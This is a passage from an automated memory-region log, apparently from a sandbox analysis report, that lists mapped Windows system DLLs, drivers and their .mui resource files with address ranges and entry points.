"c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4042 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4043 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4044 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4045 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4048 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4049 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4050 start_va = 0xb90000 end_va = 0xbb7fff monitored = 0 entry_point = 0xb91860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 4051 start_va = 0xbc0000 end_va = 0xbc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 4052 start_va = 0xb90000 end_va = 0xbb7fff monitored = 0 entry_point = 0xb91860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 4053 start_va = 0xbc0000 end_va = 0xbc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 4054 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4055 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4056 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4057 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4058 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4059 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4060 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4061 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4062 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4063 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4064 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4065 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4066 start_va = 0xb90000 end_va = 0xb9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 4067 start_va = 0xba0000 end_va = 0xbadfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 4068 start_va = 0xb90000 end_va = 0xb9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 4069 start_va = 0xba0000 end_va = 0xbadfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 4070 start_va = 0x1260000 end_va = 0x2054fff monitored = 0 entry_point = 0x1343268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 4071 start_va = 0x1260000 end_va = 0x2054fff monitored = 0 entry_point = 0x1343268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 4073 start_va = 0xde0000 end_va = 0xe89fff monitored = 0 entry_point = 0xdf4100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 4074 start_va = 0xb90000 end_va = 0xb93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 4075 start_va = 0xde0000 end_va = 0xe89fff monitored = 0 entry_point = 0xdf4100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 4076 start_va = 0xb90000 end_va = 0xb93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 4077 start_va = 0xb90000 end_va = 0xbd7fff monitored = 0 entry_point = 0xbcfd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 4078 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 4079 start_va = 0xb90000 end_va = 0xbd7fff monitored = 0 entry_point = 0xbcfd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 4080 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 4081 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 4082 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 4083 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 4084 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 4085 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 4086 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 4087 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 4088 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 4089 start_va = 0x1260000 end_va = 0x13acfff monitored = 0 entry_point = 0x1362a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 4090 start_va = 0xb90000 end_va = 0xb95fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 4091 start_va = 0x1260000 end_va = 0x13acfff monitored = 0 entry_point = 0x1362a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 4092 start_va = 0xb90000 end_va = 0xb95fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 4093 start_va = 0xb90000 end_va = 0xb9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 4094 start_va = 0xde0000 end_va = 0xe39fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 4095 start_va = 0xb90000 end_va = 0xb9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 4096 start_va = 0xde0000 end_va = 0xe39fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 4098 start_va = 0xb90000 end_va = 0xb9ffff monitored = 0 entry_point = 0xb9a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 4099 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 4100 start_va = 0xb90000 end_va = 0xb9ffff monitored = 0 entry_point = 0xb9a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 4101 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 4102 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 4103 start_va = 0xbb0000 end_va = 0xbb5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 4104 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 4105 start_va = 0xbb0000 end_va = 0xbb5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 4106 start_va = 0xde0000 end_va = 0xe33fff monitored = 0 entry_point = 0xdf3450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 4107 start_va = 0xb90000 end_va = 0xb91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 4108 start_va = 0xde0000 end_va = 0xe33fff monitored = 0 entry_point = 0xdf3450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 4109 start_va = 0xb90000 end_va = 0xb91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 4110 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 4111 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 4112 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 4113 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 4114 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 4115 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 4116 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 4117 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 4118 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4119 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4120 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4121 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4122 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4123 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4124 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4125 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4126 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4127 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4128 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4129 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4130 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4131 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4132 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4133 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4134 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xbd68c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 4135 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 4136 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xbd68c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 4137 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 4139 start_va = 0xde0000 end_va = 0xebbfff monitored = 0 entry_point = 0xe55ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 4140 start_va = 0xb90000 end_va = 0xb90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 4141 start_va = 0xde0000 end_va = 0xebbfff monitored = 0 entry_point = 0xe55ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 4142 start_va = 0xb90000 end_va = 0xb90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 4143 start_va = 0xde0000 end_va = 0xec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 4144 start_va = 0xb90000 end_va = 0xbb8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 4145 start_va = 0xde0000 end_va = 0xec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 4146 start_va = 0xb90000 end_va = 0xbb8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 4147 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 4148 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 4149 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 4150 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 4151 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 4152 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 4154 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 4155 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") 